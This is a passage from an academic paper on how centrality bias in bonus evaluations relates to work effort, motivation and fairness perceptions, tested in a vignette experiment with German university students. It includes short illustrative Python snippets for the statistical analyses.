You can use the ?. and ?() null-conditional operators to test for Nothing before performing a member access or index operation.
Multi-line string literals
String literals can contain newline sequences. You no longer need the old workaround of using <xml><![CDATA[...text with newlines...]]></xml>.Value
You can put comments after implicit line continuations, inside initializer expressions, and among LINQ expression terms.
Smarter fully-qualified name resolution
Given code such as Threading.Thread.Sleep(1000), Visual Basic used to look up the namespace "Threading", discover it was ambiguous between System.Threading and System.Windows.Threading, and then report an error. Visual Basic now considers both possible namespaces together. If you show the completion list, the Visual Studio editor lists members from both types in the completion list.
Year-first date literals
You can have date literals in yyyy-mm-dd format, #2015-03-17 16:10 PM#.
Readonly interface properties
You can implement readonly interface properties using a readwrite property. The interface guarantees minimum functionality, and it does not stop an implementing class from allowing the property to be set.
TypeOf <expr> IsNot <type>
To improve the readability of your code, you can now use TypeOf together with IsNot.
#Disable Warning <ID> and #Enable Warning <ID>
You can disable and enable specific warnings for regions within a source file.
XML doc comment improvements
When writing doc comments, you get smart editor and build support for validating parameter names, proper handling of crefs (generics, operators, etc.), colorizing, and refactoring.
Partial module and interface definitions
In addition to classes and structs, you can declare partial modules and interfaces.
#Region directives inside method bodies
You can put #Region…#End Region delimiters anywhere in a file, inside functions, and even spanning across function bodies.
Overrides definitions are implicitly overloads
If you add the Overrides modifier to a definition, the compiler implicitly adds Overloads so that you can type less code in common cases.
CObj allowed in attributes arguments
The compiler used to give an error that CObj(…) was not a constant when used in attribute constructions.
Declaring and consuming ambiguous methods from different interfaces
Previously the following code yielded errors that prevented you from declaring IMock or from calling GetDetails (if these had been declared in C#):
Interface ICustomer
    Sub GetDetails(x As Integer)
End Interface

Interface ITime
    Sub GetDetails(x As String)
End Interface

Interface IMock : Inherits ICustomer, ITime
    Overloads Sub GetDetails(x As Char)
End Interface

Interface IMock2 : Inherits ICustomer, ITime
End Interface
Now the compiler will use normal overload resolution rules to choose the most appropriate GetDetails to call, and you can declare interface relationships in Visual Basic like those shown in the sample.
See also
What's New in Visual Studio 2017
|
https://docs.microsoft.com/en-us/dotnet/visual-basic/getting-started/whats-new
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
I have to create a city application that prompts the user for a series of city names and then displays the number of city names entered, followed by the name of the city with the most characters, in uppercase letters.
How come it always outputs the last name entered?
import java.util.Scanner;

public class Cities {
    public static void main(String[] args) {
        Scanner input = new Scanner(System.in);
        int maxLength = 0;
        int length = 0;
        int count = 0;
        String longName = "";
        System.out.print("Enter a city name <stop to quit> :");
        String name = input.nextLine();
        while (!(name.equals("stop"))) {
            length = name.length();
            if (length > maxLength)
                longName = name;
            System.out.print("Enter another city name <stop to quit> :");
            name = input.next();
            count++;
        }
        System.out.println(count + " were entered");
        System.out.println("The longest was : " + longName);
    }
}
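For reference, the loop never updates maxLength, so the condition length > maxLength is true for every non-empty name and longName ends up holding the last city entered; it also mixes nextLine() and next(). A minimal corrected sketch (assuming the intent is to count the entries, track the longest name, and print it in uppercase) could look like this:

import java.util.Scanner;

public class Cities {
    public static void main(String[] args) {
        Scanner input = new Scanner(System.in);
        int maxLength = 0;
        int count = 0;
        String longName = "";
        System.out.print("Enter a city name <stop to quit> :");
        String name = input.nextLine();
        while (!name.equals("stop")) {
            count++;                          // count only real city names
            if (name.length() > maxLength) {  // remember the longest name so far
                maxLength = name.length();    // update the threshold as well
                longName = name;
            }
            System.out.print("Enter another city name <stop to quit> :");
            name = input.nextLine();          // stay consistent with nextLine()
        }
        System.out.println(count + " were entered");
        System.out.println("The longest was : " + longName.toUpperCase());
    }
}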
|
https://www.daniweb.com/programming/software-development/threads/398821/string-problem
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
Ballerina Services in Serverless World
Learn how to run Ballerina Services in a serverless capacity in conjunction with Amazon AWS.
Running a Ballerina Service as a Serverless Function in AWS Lambda
Ballerina is a programming language optimized for integration and it is being developed by WSO2. With Ballerina, it’s very easy to write integration services. For example, see the following Hello World service in Ballerina (hello-world-service.bal).
import ballerina.net.http;

service<http> helloWorld {
    resource sayHello (http:Request req, http:Response res) {
        res.setStringPayload("Hello, World!");
        _ = res.send();
    }
}
When you compile (ballerina build hello-world-service.bal) and run this program (ballerina run hello-world-service.balx), Ballerina will run an HTTP server as it recognizes that you want to expose a service directly over the network via the HTTP protocol. For example, you can now directly send a GET request to the Ballerina service resource named “sayHello”.
Example:
$ curl Hello, World!
There is much more you can do with Ballerina and you can go through the Ballerina By Example page to learn about the language features.
In this story, I’m explaining how you can run your Ballerina Service as a serverless function in AWS Lambda. Before that, let’s see what is meant by “Serverless”.
What is Serverless and AWS Lambda?
Serverless is simply about not having to worry about servers when you write an application; you focus only on the application logic. Basically, you don’t need to manage your own server hosts and server processes. This is just a simple explanation of “serverless.” I recommend you read more about “Serverless Architectures.” O’Reilly also has a great free book entitled What is Serverless?
There are many benefits in a serverless world. Most importantly, it reduces costs and there is a shorter lead time. This is very important for innovation as you can vastly reduce the time to implement your application.
AWS Lambda is a compute service provided by Amazon Web Services. With AWS Lambda, you can deploy your code and run it as a serverless function. The AWS Lambda will manage the server resources and the server process for you. You only need to concentrate on your application logic.
Following are the languages supported by AWS Lambda currently.
- Java
- Node.js
- C#
- Python
Currently, Ballerina runs on the BVM (Ballerina Virtual Machine), which is a Java-based VM. Therefore, we can use the Java language runtime provided by AWS Lambda.
How Does AWS Lambda Work?
In AWS Lambda, we deploy the code to run based on events. For example, when there is an HTTP request, the AWS Lambda can trigger your code.
In AWS Lambda, regardless of the language, we need to write a handler method, which is first called by AWS Lambda when it begins executing the code.
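For orientation, in the Java runtime this entry point is the com.amazonaws.services.lambda.runtime.RequestHandler interface. A bare-bones illustration is shown below; the EchoHandler class name and the echo behaviour are made-up examples for this sketch, not part of the ballerina-lambda project:

import com.amazonaws.services.lambda.runtime.Context;
import com.amazonaws.services.lambda.runtime.RequestHandler;

// The handler class AWS Lambda calls: I is the deserialized input, O the serialized output.
public class EchoHandler implements RequestHandler<String, String> {
    @Override
    public String handleRequest(String input, Context context) {
        // The Context object exposes metadata such as the remaining execution time.
        return "Received: " + input
                + " (remaining ms: " + context.getRemainingTimeInMillis() + ")";
    }
}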
How to Invoke Ballerina Service Resource?
Since Ballerina is running on the JVM, we need to write a handler in Java.
Within this handler method, we need to process the request and invoke a Ballerina service resource directly.
Running the Ballerina server within the handler is not an option, as the serverless function has to be stateless and we cannot start a server for each HTTP request event. Fortunately, there is a way to directly execute a Ballerina service resource using Java APIs. These Java APIs are not official APIs and they may be removed in the future.
This is similar to the approach used by Lambada framework, which allows you to implement JAX-RS APIs and deploy in a serverless fashion. With Lambada, we can migrate existing JAX-RS applications to AWS Lambda. Lambada framework basically invokes the JAX-RS method directly using the AWS Lambda handler method.
To implement the handler, I used the Java interface com.amazonaws.services.lambda.runtime.RequestHandler and used POJO classes for the request and response.
In the constructor, the Ballerina service is compiled using an API and the compiled result is kept in the memory. Currently there is no API to directly run a compiled Ballerina service (with .balx extension).
The handler method locates the service resource in the compiled Ballerina service and executes it programmatically.
Since we are planning to use an HTTP request to trigger the handler method, we can use the “Amazon API Gateway.” When using the API Gateway, the input and output formats are predefined. Therefore, we just have to develop the request and response classes mapping to the input and output formats.
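To make the flow a bit more concrete, here is a rough sketch of what such a handler could look like. The GatewayRequest/GatewayResponse POJOs, the class name BallerinaHandlerSketch and the invokeBallerinaResource helper are hypothetical placeholders for illustration only — the actual ballerina-lambda project compiles the Ballerina service in the constructor and dispatches to the service resource through Ballerina’s unofficial Java APIs:

import java.util.HashMap;
import java.util.Map;

import com.amazonaws.services.lambda.runtime.Context;
import com.amazonaws.services.lambda.runtime.RequestHandler;

// Hypothetical POJOs roughly mirroring the API Gateway proxy request/response format.
class GatewayRequest {
    public Map<String, String> headers = new HashMap<>();
    public String body;
}

class GatewayResponse {
    public int statusCode;
    public Map<String, String> headers = new HashMap<>();
    public String body;
}

public class BallerinaHandlerSketch implements RequestHandler<GatewayRequest, GatewayResponse> {

    public BallerinaHandlerSketch() {
        // In the real project: compile the Ballerina service once here and keep the
        // compiled program in memory (this is the "Handler Init Time" measured later).
    }

    @Override
    public GatewayResponse handleRequest(GatewayRequest request, Context context) {
        GatewayResponse response = new GatewayResponse();
        // Placeholder for dispatching the payload to the compiled Ballerina resource.
        String payload = invokeBallerinaResource(request.body);
        response.statusCode = 200;
        response.headers.put("Amazon-Request-ID", context.getAwsRequestId());
        response.body = payload;
        return response;
    }

    private String invokeBallerinaResource(String body) {
        // Stand-in for the (unofficial) Ballerina Java APIs used by ballerina-lambda.
        return body;
    }
}

The point of the sketch is simply that all Ballerina-specific work happens behind the handler method, so the AWS-facing contract remains a plain request/response mapping.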
I created a Maven project and implemented a request handler as mentioned above. The source code is available at:
How to Run Your Own Ballerina Service in AWS Lambda
With “ballerina-lambda”, you can now run your own Ballerina service without having to worry about any AWS Lambda-specific code.
It’s important to note that the “ballerina-lambda” project only supports invoking a specific service resource method in your Ballerina service.
Let’s take a sample Ballerina Service:
package helloService;

import ballerina.net.http;

@http:configuration {basePath:"/hello"}
service<http> helloService {
    @http:resourceConfig {
        methods:["POST"],
        path:"/"
    }
    resource sayHello(http:Request req, http:Response res) {
        json jsonRequest = req.getJsonPayload();
        string firstName;
        string lastName;
        firstName, _ = (string)jsonRequest.Name.FirstName;
        lastName, _ = (string)jsonRequest.Name.LastName;
        json payload = {"Response":""};
        payload.Response = "Hello, " + firstName + " " + lastName;
        res.setJsonPayload(payload);
        _ = res.send();
    }
}
This service accepts a JSON payload as follows.
{ "Name":{ "FirstName":"Isuru", "LastName":"Perera" } }
Now, to deploy this Ballerina Service to the AWS Lambda, we need to create a deployment package.
Following are the steps to create the deployment package.
- Clone the ballerina-lambda repository.
git clone --depth=1
cd ballerina-lambda/
- Save the Ballerina service in the ballerina-services directory. Currently, ballerina-lambda expects a Ballerina package name, which includes the Ballerina service. Therefore, you need to make sure that the Ballerina service is in a package. There is already a sample helloWorldService inside the ballerina-services directory.
cd ballerina-services/
mkdir helloService
cd helloService
vi helloService.bal  # Save the above helloService in this file.
cd ../../
- Now build the maven project.
mvn clean package
- There should be a zip file named ballerina-lambda-1.0.0-SNAPSHOT.zip inside the target directory.
- Now login to AWS Console and visit “Lambda” service.
- Click on “Create function.” Let’s author a Lambda function from scratch.
- Use BallerinaHelloService for the name and select Java 8 for the runtime.
- You also need to select a role for the function. You can create a new role named “BallerinaHelloServiceRole” and select “Basic Edge Lambda permissions” from Policy templates. You may also select an existing role if you already have one.
- Click on “Create function.” After that you need to configure the Lambda function.
- In (1), you need to upload the ballerina-lambda-1.0.0-SNAPSHOT.zip file.
- Then you need to specify the handler method in (2). The handler method for the ballerina-lambda project is as follows.
com.github.chrishantha.lambda.ballerina.BallerinaRequestHandler::handleRequest
- Add a trigger (3) using “API Gateway”.
- When configuring, click on “Enter value” for API name (1) and specify “BallerinaHelloService”
- Deployment stage (2) is “prod”
- For “Security” (3), select “Open” and “Add” the trigger.
- Click on “BallerinaHelloService” again to configure “Environment variables” and add following environment keys and values.
BAL_PACKAGE=helloService
BAL_SERVICE_PATH=/hello/
BAL_SERVICE_METHOD=POST
- Select at least 256MB for Memory in “Basic settings”. Otherwise, the Ballerina service may not work. The CPU power is proportional to the amount of memory. See “Q: How are compute resources assigned to an AWS Lambda function?” in AWS Lambda FAQ.
- Click “Save” to save the “BallerinaHelloService” function.
- Now you can click on “API Gateway” configuration to see the “Invoke URL” for the Lambda function.
- You can send an HTTP request to the “Invoke URL” and test the Ballerina Service running as a Lambda function. For example:
curl -d '{"Name": {"FirstName": "Isuru", "LastName":"Perera"}}' {"Response":"Hello, Isuru Perera"}
What Happens When We Trigger the Lambda Function?
Since the Ballerina Hello Service Lambda function is working as a serverless function, the “function instance” will be created only when we send an HTTP request. For subsequent requests, the “function instance” may be reused, and we don’t know how long the “function instance” will be alive.
See the following sequence diagrams to understand how the first request and subsequent requests work.
The above sequence diagrams are important to understand, especially when you are concerned about response-time latencies.
The ballerina-lambda function code internally measures the times at different points and sends those data via response headers. The following are the response headers:
- VM Startup Time (ms) — This is the startup time of the JVM. This is only valid for the first request.
- Handler Init Time (ms) — This is the time taken to initialize the request handler. This is basically the time taken for the request handler constructor, which includes the Ballerina service compilation. This is only valid for the first request.
- Request Processing Time (ms) — This is the processing time of the request handling method.
- Lambda Remaining Time (ms) — This is the remaining time of the Lambda function (as calculated by AWS Lambda). This is taken from the AWS Context object. It is the remaining time until the Lambda timeout, which is configured in “Basic settings.” So, this roughly equals “Lambda Timeout (ms) − Request Processing Time (ms)”.
- Lambda Up Time (ms) — This is the JVM up time at the end of request processing.
- Amazon Request ID — This is the request ID from Amazon.
- Function Name — This is the name of the AWS Lambda Function
- Function Version — This is the version of the AWS Lambda Function
The first request time includes “VM Startup Time” + “Handler Init Time” + “Request Processing Time” + Network Latency.
All subsequent requests only include “Request Processing Time” + Network Latency.
However, for all requests, AWS Lambda is charging only for “Request Processing Time” + Network Latency.
Conclusion
In this story, I explained how you can run your Ballerina Service as a Serverless function in AWS Lambda.
You don’t have to do any AWS Lambda specific development and you can directly use the ballerina-lambda project to deploy your own Ballerina Service in AWS Lambda.
Amazon API Gateway can be used to trigger the Lambda function. The first request response time includes the time to start the function instance and the time to initialize the handler in addition to the request processing time and network latency.
Published at DZone with permission of Isuru Perera . See the original article here.
|
https://dzone.com/articles/ballerina-services-in-serverless-world
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
sandbox/Antoonvh/testpoisson.c
Convergence of the Poisson solver in 1D
On this page we try to find some of the convergence properties of the Basilisk Poisson solver. The solver used is of the ‘multi-grid’ type and utilizes an iterative scheme to arrive at a converged solution. By default the solver iterates until the maximum residual is below some set tolerance. On this page we solve a Poisson problem on 11 different grids with various levels of refinement and let the solver iterate (i.e. cycle) ten times. We will check the convergence properties with respect to the cycles applied and the resolution. The goal is to check if we obtain sensible results so we can extend our analysis to grids generated according to an adaptive algorithm.
The chosen Problem
The Poisson problem we will be solving for reads,

\[ \frac{d^2 a}{dx^2} = e^{-x^2}. \]

According to Wolfram|Alpha the corresponding solution is,

\[ a(x) = c_1 x + c_2 + \frac{\sqrt{\pi}}{2}\, x\, \mathrm{erf}(x) + \frac{e^{-x^2}}{2}, \]

with constants \(c_1\) and \(c_2\) determined by the boundary conditions.
The script
The Poisson solver is included and we opt for a one-dimensional tree grid. The tree functionality will be useful later.
#include "grid/bitree.h" #include "poisson.h"
The analytical solution can be evaluated to check the numerical solution. Furthermore, we initialize some useful stuff.
#define sol(x,c1,c2) ((c1*x)+c2+(pow(M_PI,0.5)*(x)*erf(x)/2)+(exp(-(x*x))/2))
double c1,c2;
scalar b[],a[];
mgstats mg;
FILE * fp1;
FILE * fp2;
char name[100];
Since our solution represents volume-averaged values we need to translate the analytical solution to a locally averaged one. Unfortunately, Wolfram Alpha was unable to provide me with the integral form of the solution. Therefore a numerical integrator of the analytical solution is defined.
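Concretely, for a grid cell of width \(\Delta\) centred at \(x_i\), the quantity this integrator approximates (by refining a Riemann sum until it converges to the requested tolerance) is the cell average of the analytical solution:

\[ \bar{a}_i \;=\; \frac{1}{\Delta} \int_{x_i - \Delta/2}^{\,x_i + \Delta/2} a(x)\, \mathrm{d}x . \]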
double numintsol(double tol, double xi, double D, double c1, double c2){ // A Riemann integrator
  double into = 5;
  double intn = 1;
  double integral;
  double j = 10;
  while ((fabs(into - intn)/fabs(intn)) > tol){ // Perform the integration until the integral has converged
    into = intn;
    intn = 0.;
    integral = 0;
    for (int m = 0; m < j; m++){ // Sum the analytical solution j times
      double xp = (xi - (D/2) + (D/(j*2)) + (((double)m)*D/j)); // At equally spaced locations in the grid box
      integral += sol(xp, c1, c2);
    }
    intn = integral/j;
    j = j*2; // Increase j if the integral has not converged up to the set standards
  }
  return intn;
}
Similarly, the source term should be defined consistently.
double f(double xi, double Delta){
  return (pow(M_PI, 0.5)*(erf(xi + (Delta/2)) - erf(xi - (Delta/2))))/(2*Delta);
}
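Note that this is the exact cell average of the analytical source term \(e^{-x^2}\), since

\[ \frac{1}{\Delta}\int_{x_i-\Delta/2}^{\,x_i+\Delta/2} e^{-x^2}\,\mathrm{d}x \;=\; \frac{\sqrt{\pi}}{2\Delta}\left[\mathrm{erf}\!\left(x_i+\tfrac{\Delta}{2}\right)-\mathrm{erf}\!\left(x_i-\tfrac{\Delta}{2}\right)\right]. \]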
The rest of the script occurs in the main() function. The spatial extent of the grid is defined, suitable boundary conditions are chosen and the corresponding values for c1 and c2 are set.
int main(){
  L0 = 10;
  X0 = -L0/2;
  a[right] = dirichlet(0.);
  a[left] = neumann(0.); // Default Basilisk
  c1 = pow(M_PI, 0.5)/2;
  c2 = -sol(5, c1, 0);
  fp2 = fopen("gridcycles.dat", "w");
A loop is used to iterate over 11 different resolutions, varying from 8 to 8192 grid cells. Each time the solution and source term are initialized.
  for (int j = 0; j < 11; j++){
    init_grid(1 << (j + 3));
    sprintf(name, "MGcycles%d.dat", N);
    fp1 = fopen(name, "w");
    foreach(){
      a[] = 0.; // This choice is the problem of the poisson solver
      b[] = f(x, Delta);
    }
    double err;
    TOLERANCE = 10; // Large tolerance to prevent unwanted iterations
    fprintf(ferr, "Grid N=%d\n", N);
    boundary({a, b});
On each grid we let the Poisson solver iterate 10 times. After every iteration we write down the statistics of the solver and the error in the obtained solution.
    for (int i = 0; i < 10; i++){
      mg = poisson(a, b); // Solve the system
      err = 0;
      double err2 = 0;
      foreach(){
        err += fabs(a[] - numintsol(10e-4*pow(Delta, 3.), x, Delta, c1, c2))*Delta; // We evaluate the analytical solution with 3rd-order accuracy
        err2 += fabs(a[] - sol(x, c1, c2))*Delta; // We do not use this
      }
      fprintf(fp1, "%d\t%d\t%g\t%g\t%g\t%d\t%g\t%g\n", i, mg.i, mg.resb, mg.resa, mg.sum, mg.nrelax, err, err2);
    }
    fclose(fp1);
    fprintf(fp2, "%d\t%g\t%g\n", j, L0/((double)N), err);
    fflush(fp2);
  }
  fclose(fp2);
}
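For reference, the error written to the log files is the discrete L1 norm of the difference between the numerical solution and the cell-averaged analytical solution:

\[ \mathrm{err} \;=\; \sum_i \left| a_i - \bar{a}_i \right| \Delta . \]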
Results
First we check how the maximum residual decreases with every iteration for three grids with different resolutions.
The convergence region seems to start and end at iteration numbers that are resolution dependent. For the higher resolutions the residual seems to stop converging earlier, and at a higher residual, than in the coarse-grid runs.
Next we check how the error in the solution evolves with the number of iterations.
Now we see that the smaller residuals of the coarse runs do not translate into smaller errors in the solution. Also we see that within the first few iterations the fine-grid solutions are not more accurate. It seems that only the fine-grid runs benefit from the large number of iterations. However, even for the finest-grid run the solution converges before the 10-th iteration. We can check this converged solution error in a bit more detail.
So we can conclude that the Poisson solver is second-order accurate (i.e. the error of the converged solution scales with the square of the grid spacing). Notice that this convergence takes more iterations for the higher-resolution runs.
For some elucidation, here is an additional plot.
|
http://basilisk.fr/sandbox/Antoonvh/testpoisson.c
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
Linear
Calculates the linear regression parameters and evaluates the regression line at arbitrary abscissas.
Class Linear
Linear regression is a method to best fit a linear equation (straight line) of the form \(y = a + b x\) to a collection of points, where \(b\) is the slope and \(a\) the intercept.
Example 1
- The following example displays the slope, Y intercept and regression coefficient for a certain set of 7 points.
#include <codecogs/maths/approximation/regression/linear.h>
#include <iostream>
#include <iomanip>
using namespace std;

int main()
{
  double x[7] = { 1.5, 2.4, 3.2, 4.8, 5.0, 7.0, 8.43 };
  double y[7] = { 3.5, 5.3, 7.7, 6.2, 11.0, 9.5, 10.27 };

  Maths::Regression::Linear A(7, x, y);

  cout << "    Slope = " << A.getSlope() << endl;
  cout << "Intercept = " << A.getIntercept() << endl << endl;
  cout << "Regression coefficient = " << A.getCoefficient() << endl;

  cout << endl << "Regression line values" << endl << endl;
  for (double i = 0.0; i <= 3; i += 0.6)
  {
    cout << "x = " << setw(3) << i << "  y = " << A.getValue(i);
    cout << endl;
  }
  return 0;
}

Output:
    Slope = 0.904273
Intercept = 3.46212

Regression coefficient = 0.808257

Regression line values

x =   0  y = 3.46212
x = 0.6  y = 4.00469
x = 1.2  y = 4.54725
x = 1.8  y = 5.08981
x = 2.4  y = 5.63238
x =   3  y = 6.17494
Authors
- Lucian Bentea (August 2005)
Source Code
Source code is available when you agree to a GP Licence or buy a Commercial Licence.
Members of Linear
Linear
Initializes the class by calculating the slope, intercept and regression coefficient based on the given constructor arguments.
Note
- The slope should not be infinite.
GetValue
Evaluates the regression line at a given abscissa.
GetCoefficient
The regression coefficient indicates how well the linear regression fits the original data. It is an expression of the error in the fitting and is defined as

\[ r \;=\; \frac{n\sum xy - \sum x \sum y}{\sqrt{\left(n\sum x^2 - (\sum x)^2\right)\left(n\sum y^2 - (\sum y)^2\right)}} . \]

If \(n\sum x^2 - (\sum x)^2 = 0\) and \(n\sum y^2 - (\sum y)^2 = 0\), then r is considered to be equal to 1.
Linear Once
This function implements the Linear class for one-off calculations, thereby avoiding the need to instantiate the Linear class yourself.
Example 2
- The following graph fits a straight line to a set of sample data points.
|
http://www.codecogs.com/library/maths/approximation/regression/linear.php
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
Unlike WPF, UWP does not support implicit data templates that are applied automatically based on the DataType of a DataTemplate; in a UWP app the x:Key attribute of a DataTemplate must be set to a string.
Let’s consider the following sample code where three different types are defined – Apple, Banana and Pear. Each of these classes implements a common interface IFruit, and the view model exposes a collection of fruits that a ListBox in the view binds to. The details of the currently selected fruit are displayed in a ContentControl.
public interface IFruit
{
    string Name { get; }
}

public class Apple : IFruit
{
    public string Name => "Apple";
}

public class Banana : IFruit
{
    public string Name => "Banana";
}

public class Pear : IFruit
{
    public string Name => "Pear";
}

public class ViewModel : INotifyPropertyChanged
{
    public List<IFruit> Fruits { get; } = new List<IFruit>() { new Apple(), new Banana(), new Pear() };

    private IFruit _selectedFruit;
    public IFruit SelectedFruit
    {
        get { return _selectedFruit; }
        set
        {
            _selectedFruit = value;
            NotifyPropertyChanged();
        }
    }

    public event PropertyChangedEventHandler PropertyChanged;
    private void NotifyPropertyChanged([CallerMemberName] String propertyName = "") =>
        PropertyChanged?.Invoke(this, new PropertyChangedEventArgs(propertyName));
}
<Grid>
    <Grid.ColumnDefinitions>
        <ColumnDefinition Width="Auto"/>
        <ColumnDefinition />
    </Grid.ColumnDefinitions>
    <ListBox ItemsSource="{Binding Fruits}"
             SelectedItem="{Binding SelectedFruit}"
             DisplayMemberPath="Name" />
    <ContentControl Content="{Binding SelectedFruit}"
                    Grid.Column="1" />
</Grid>
In App.xaml there is a merged resource dictionary that contains a specific DataTemplate associated with each type of fruit that defines how the fruit is presented to the user on the screen.
<Application x:
    <Application.Resources>
        <ResourceDictionary>
            <ResourceDictionary.MergedDictionaries>
                <ResourceDictionary Source="DataTemplates.xaml" />
            </ResourceDictionary.MergedDictionaries>
        </ResourceDictionary>
    </Application.Resources>
</Application>
This kind of master/detail experience is a pretty common scenario to implement in a UI application. So how to solve this in a UWP app?
As mentioned before, you must set the x:Key attribute of a DataTemplate in a UWP app to a string, and this basically means that the DataTemplate isn’t implicit any more. The closest you get to an implicit DataTemplate in UWP is to set the x:Key attribute to a value that can be used to uniquely identify the type to which you want to apply the template, like for example the name of the type:
You could then write a converter class that looks up the data template based on the type of the data object:
public class ImplicitDataTemplateConverter : IValueConverter
{
    public object Convert(object value, Type targetType, object parameter, string language)
    {
        if (value == null || App.Current == null)
            return null;

        object dataTemplate;
        if (App.Current.Resources.TryGetValue(value.GetType().Name, out dataTemplate))
            return dataTemplate;

        return null;
    }

    public object ConvertBack(object value, Type targetType, object parameter, string language)
    {
        throw new NotSupportedException();
    }
}
The last thing you need to do is then to bind the ContentTemplate property of the ContentControl to the SelectedFruit property of the view model and use the converter to select the appropriate data template:
<Page x:
    <Page.DataContext>
        <local:ViewModel />
    </Page.DataContext>
    <Page.Resources>
        <local:ImplicitDataTemplateConverter x:Key="ImplicitDataTemplateConverter" />
    </Page.Resources>
    <Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">
        <Grid.ColumnDefinitions>
            <ColumnDefinition Width="Auto"/>
            <ColumnDefinition />
        </Grid.ColumnDefinitions>
        <ListBox ItemsSource="{Binding Fruits}"
                 SelectedItem="{Binding SelectedFruit, Mode=TwoWay}"
                 DisplayMemberPath="Name" />
        <ContentControl Content="{Binding SelectedFruit}"
                        ContentTemplate="{Binding SelectedFruit, Converter={StaticResource ImplicitDataTemplateConverter}}"
                        Grid.Column="1" />
    </Grid>
</Page>
Compiled bindings support (x:Bind)
So far so good. Using this workaround, the template is being applied as expected. But what about {x:Bind}? One of the nicest XAML features of the UWP is the support for compiled bindings. Unlike {Binding}, the {x:Bind} markup extension evaluates the binding expressions at compile-time, which not only improves the runtime performance of the app but also makes it possible to detect binding errors when you build it.
To be able to use {x:Bind} in a DataTemplate you must set the x:DataType attribute to the type to which the template is supposed to be applied. If you however try to do this in the DataTemplates.xaml resource dictionary and build the application, you will get a compilation error:
<DataTemplate x:
    <TextBlock Text="I am an apple!" Foreground="Red" />
</DataTemplate>
{x:Bind} generates code at compile-time and for this to work the XAML file must be associated with a class. This is an easy thing to fix though. You could just add a DataTemplates.xaml.cs partial code-behind class to the folder where the DataTemplates.xaml resource dictionary is located. In the constructor of the partial class you should call the InitializeComponent() method to initialize the generated code:
public partial class DataTemplates : ResourceDictionary
{
    public DataTemplates()
    {
        InitializeComponent();
    }
}
You then set the x:Class attribute of the ResourceDictionary element in the XAML file to the partial class name and then the application should build just fine.
In order to be able to use {x:Bind} in the MainPage XAML you should then modify the code-behind class a bit. The view model needs to be exposed in a strongly typed fashion for the compile-time safety to work. The source of a compiled binding is always the class itself, i.e. the Page class in this case, rather than the DataContext of the element. In this case, we could add a ViewModel dependency property to the MainPage class and set it whenever the DataContext property is set:
public sealed partial class MainPage : Page
{
    public MainPage()
    {
        this.InitializeComponent();
        DataContextChanged += (s, e) => ViewModel = DataContext as ViewModel;
    }

    public static readonly DependencyProperty ViewModelProperty =
        DependencyProperty.Register(nameof(ViewModel), typeof(ViewModel), typeof(MainPage),
            new PropertyMetadata(null));

    public ViewModel ViewModel
    {
        get { return (ViewModel)GetValue(ViewModelProperty); }
        set { SetValue(ViewModelProperty, value); }
    }
}
And bind to the properties of this using {x:Bind} in the XAML markup. Remember that the default mode of {x:Bind} is OneTime, so you need to explicitly set the Mode property to OneWay for the Content and the ContentTemplate target properties of the ContentPresenter to get updated when the source properties of the view model are set:
<ContentControl Content="{x:Bind ViewModel.SelectedFruit, Mode=OneWay}"
                ContentTemplate="{x:Bind ViewModel.SelectedFruit, Mode=OneWay, Converter={StaticResource ImplicitDataTemplateConverter}}"
                Grid.Column="1" />
Finally, it should be mentioned that this is indeed a workaround to be able to use something similar to implicit data templates in UWP. It is not perfect though. You may for example have several different types with the same type name in different namespaces or assemblies, and then you need to come up with another x:Key naming strategy for the data templates than simply using the short type name. Also there is no good way of determining whether the x:DataType attribute of the data template that the converter looks up actually matches the type of the data object that is passed to the converter at runtime.
So there are certainly pitfalls but the workaround presented in this post should hopefully be applicable and work just fine as-is or with some slight application-specific modifications in the vast majority of scenarios.
This is very clear and very clever. I have just attempted my first UWP app and am discouraged by the lack of implicit data templates. Not being able to use them makes implementing MVVM more difficult in my opinion.
|
https://blog.magnusmontin.net/2017/03/25/uwp-implicit-data-template/
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
The psychological effects of centrality bias: an experimental analysis
Abstract
This paper examines the psychological mechanisms that are activated by centrality bias in the context of subjective performance evaluation. Centrality bias refers to compressed evaluations of subordinates, implying that the variance in the performance of the evaluated employees is higher than the variance in the rewards determined by the superior. Based on insights from the social psychology literature, we argue that centrality bias may trigger different psychological mechanisms which affect the subordinates’ willingness to exert work effort. We propose that these effects differ depending on whether employees are above-average or below-average performers. In line with our predictions, we detect a considerable asymmetry in the effects of centrality bias. In particular, we find that the relationship between centrality bias and the willingness to exert work effort is negatively mediated by controlled motivation and procedural fairness perceptions for above-average performers. For below-average performers, we find that centrality bias is positively related to procedural fairness perceptions which are, however, unrelated to the willingness to exert work effort. In addition, we shed light on the role of peer information and find that its disclosure does not have a significant impact on the psychological mechanisms at work.
Keywords: Autonomous motivation · Centrality bias · Controlled motivation · Procedural fairness · Subjective performance evaluation
JEL Classification: M41, M52
1 Introduction
The objective of this paper is to advance our knowledge on the behavioural implications of centrality bias. For this reason, we illuminate the psychological mechanisms that are activated by compressed subjective performance evaluations. Subjectivity in the context of performance evaluation has gained considerable momentum in recent years due to the shortcomings of objective performance measures (Ahn et al. 2010; Bol 2011; Cheng and Coyte 2014; Voußem et al. 2016). In particular, objective measures may be insensitive to employees’ actions, incongruent with organizational objectives, noisy concerning uncontrollable factors or incomplete with regard to an employee’s performance (Bol 2008; Rajan and Reichelstein 2006; Woods 2012). Subjective adjustments to objective performance measures made by the superior during the determination of monetary rewards may mitigate these shortcomings (Dai et al. 2018; Höppe and Moers 2011).1 Correspondingly, empirical evidence suggests that monetary rewards which are based on subjective assessments have a positive impact on pay satisfaction, productivity and profitability (Gibbs et al. 2004).
